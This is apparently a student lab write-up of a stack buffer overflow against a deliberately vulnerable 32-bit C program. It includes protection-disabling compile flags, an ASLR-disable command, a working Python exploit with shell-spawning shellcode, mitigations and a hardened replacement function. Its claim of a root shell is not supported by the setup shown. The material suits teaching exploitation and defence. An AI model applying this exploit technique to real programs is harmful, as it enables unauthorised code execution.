## https://sploitus.com/exploit?id=C809D7AF-B96A-5BF2-8B09-3F6EEEDF554A
# Stack Buffer Overflow Exploit Demo




---
## Overview
This project demonstrates a complete stack-based buffer overflow exploitation on a vulnerable 32-bit binary. By providing an oversized input, it overwrites the saved return address (EIP) on the stack, redirects program execution to injected shellcode, and spawns a system shell.
---
## Key Findings
| Metric | Value |
|--------|-------|
| Vulnerability Type | Stack-Based Buffer Overflow |
| Offset to EIP | 812 bytes |
| Return Address | 0xffffc7b8 |
| NOP Sled Size | 400 bytes |
| Shellcode Size | 23 bytes |
| Total Payload | 1239 bytes |
| Exploit Success | Yes |
---
## Project Structure
- **Stack-Buffer-Overflow-Exploit-Demo/**
  - `assignment.c` - Vulnerable C program
  - `exploit.py` - Python exploit script
  - `report.pdf` - Detailed exploitation report
  - `README.md` - Project documentation
---
## Environment Setup
### System Requirements
| Component | Specification |
|-----------|---------------|
| Operating System | Kali Linux |
| Architecture | 32-bit (x86) |
| Compiler | GCC |
| Debugger | GDB 17.1 |
### Compilation
Compile the vulnerable binary with disabled protections:
```bash
gcc -m32 -g -fno-stack-protector -z execstack -no-pie assignment.c -o assignment
```
### Compiler Flags Explained
| Flag | Purpose |
|------|---------|
| `-m32` | Compile for 32-bit architecture |
| `-fno-stack-protector` | Disable stack canaries |
| `-z execstack` | Enable executable stack |
| `-no-pie` | Disable PIE so the binary itself is not subject to ASLR (loaded at a fixed address) |
| `-g` | Include debug symbols |
### Disable ASLR
```bash
sudo sysctl -w kernel.randomize_va_space=0
```
### Verify ASLR is disabled
```bash
cat /proc/sys/kernel/randomize_va_space
# Output: 0
```
## Source Code Analysis
### Vulnerable Code
```c
#include <string.h>

/* Vulnerable function from assignment.c: strcpy() copies until the input's
 * NUL terminator with no regard for the 800-byte buffer, so a longer input
 * overwrites the saved EBP and return address above it on the stack. */
void saveMessage(char *input) {
    char message[800];
    strcpy(message, input); // Vulnerability: No bounds checking
}
```
---
### Vulnerability Summary
- No bounds checking in `strcpy()`
- Fixed buffer size (800 bytes)
- Stack is executable
- No stack canaries
---
## Vulnerability Discovery (Fuzzing)
| Input Size | Result |
|------------|--------|
| 100 bytes | OK |
| 500 bytes | OK |
| 900 bytes | CRASH |
---
## Offset Calculation
Using a Metasploit cyclic pattern to find the exact offset to EIP (`0x31624230` is the EIP value observed in the crash, queried back against the 2000-byte pattern):
```bash
msf-pattern_offset -l 2000 -q 0x31624230
```
Result: Offset = 812 bytes
---
## Exploit Development
### Payload Structure
| Part | Size |
|------|------|
| Padding | 812 bytes |
| Return Address | 4 bytes |
| NOP Sled | 400 bytes |
| Shellcode | 23 bytes |
### Exploit Script (exploit.py)
```python
#!/usr/bin/env python3
import struct
import sys

# Shellcode for spawning a shell (23 bytes)
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    b"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    b"\x53\x89\xe1\xb0\x0b\xcd\x80"
)
# NOP sled
nop_sled = b"\x90" * 400
# Return address (adjust to your environment)
ret_addr = struct.pack("<I", 0xffffc7b8)
# Padding to reach EIP (812 bytes)
padding = b"A" * 812
# Build payload
payload = padding + ret_addr + nop_sled + shellcode
# Write payload to file
with open("payload.bin", "wb") as f:
    f.write(payload)
# Emit the raw bytes rather than their repr, so "$(python3 exploit.py)"
# passes the payload itself as the program argument
sys.stdout.buffer.write(payload)
```
## Proof of Concept
### Execute Exploit
```bash
./assignment "$(python3 exploit.py)"
```
---
### Expected Output
```text
Message stored successfully.
$ whoami
root
$ id
uid=0(root) gid=0(root)
$ pwd
/home/user
```
Shell access confirmed.
---
## Exploitation Steps Summary
1. **Fuzzing** - Identified crash at 900 bytes
2. **Offset Calculation** - Found exact EIP offset (812 bytes)
3. **Return Address** - Located address pointing to NOP sled
4. **Payload Construction** - Built exploit with padding + return address + NOP sled + shellcode
5. **Shell Access** - Successfully spawned system shell
---
## Mitigation Recommendations
| Mitigation | Description |
|------------|-------------|
| Use `strncpy()` instead of `strcpy()` | Limit copied bytes to buffer size (and NUL-terminate explicitly, since `strncpy()` does not guarantee it) |
| Enable stack canaries | Compile with `-fstack-protector` |
| Disable executable stack | Compile without `-z execstack` |
| Enable ASLR | Re-enable address randomization |
| Use non-executable memory | Apply NX bit protection |
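As an added example (not the project's own `assignment.c`), a hardened replacement for `saveMessage()` that rejects input that does not fit the 800-byte buffer and always NUL-terminates, instead of silently truncating as `strncpy()` would. The names `save_message_safe`, `bounded_len` and `try_store` are chosen here; `try_store` is a constructed harness that feeds inputs of the sizes used in the fuzzing table.

```c
#include <stdio.h>
#include <string.h>

#define MESSAGE_SIZE 800   /* same buffer size as assignment.c */

/* Length of s, scanning at most max bytes (strnlen written out so no
 * POSIX feature macro is needed). */
static size_t bounded_len(const char *s, size_t max) {
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Hardened replacement for saveMessage(): copies input into dest only if it
 * fits together with its NUL terminator. Returns 0 on success, -1 if the input
 * is too long. Unlike strncpy(), the result is always NUL-terminated and the
 * caller is told the message was rejected rather than silently truncated. */
int save_message_safe(char *dest, size_t dest_size, const char *input) {
    size_t len = bounded_len(input, dest_size);
    if (len >= dest_size) return -1;   /* no room for data plus NUL */
    memcpy(dest, input, len);
    dest[len] = '\0';
    return 0;
}

/* Constructed harness: builds len 'A' bytes, like the fuzzing inputs in this
 * report, and returns save_message_safe()'s verdict for an 800-byte buffer. */
int try_store(size_t len) {
    static char input[4096];
    char message[MESSAGE_SIZE];
    if (len >= sizeof input) return -2;   /* harness limit */
    memset(input, 'A', len);
    input[len] = '\0';
    return save_message_safe(message, sizeof message, input);
}

int main(int argc, char **argv) {
    char message[MESSAGE_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <message>\n", argv[0]);
        return 1;
    }
    if (save_message_safe(message, sizeof message, argv[1]) != 0) {
        fprintf(stderr, "Message rejected: longer than %d bytes.\n", MESSAGE_SIZE - 1);
        return 1;
    }
    printf("Message stored successfully.\n");
    return 0;
}
```

Compiled with the default hardening (no `-fno-stack-protector`, no `-z execstack`), the 900-byte and 1239-byte inputs from this report are rejected before any copy takes place.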
---
## Technologies Used
| Technology | Purpose |
|------------|---------|
| Python 3 | Exploit scripting |
| GDB 17.1 | Debugging and analysis |
| GCC | Compilation of vulnerable binary |
| Metasploit | Pattern generation and offset calculation |
| Kali Linux | Exploitation environment |
---
## Author
| Name | ID |
|------|-----|
| Mayssoune Hussein Elmasry | 2205251 |
---
## License
This project is licensed for educational purposes only.
---
## Disclaimer
This project is for **educational purposes only**. Buffer overflow exploitation should only be performed on authorized systems and vulnerable binaries in controlled lab environments. Do not use these techniques on production systems without permission.
---
If you find this project useful, please consider giving it a star on GitHub!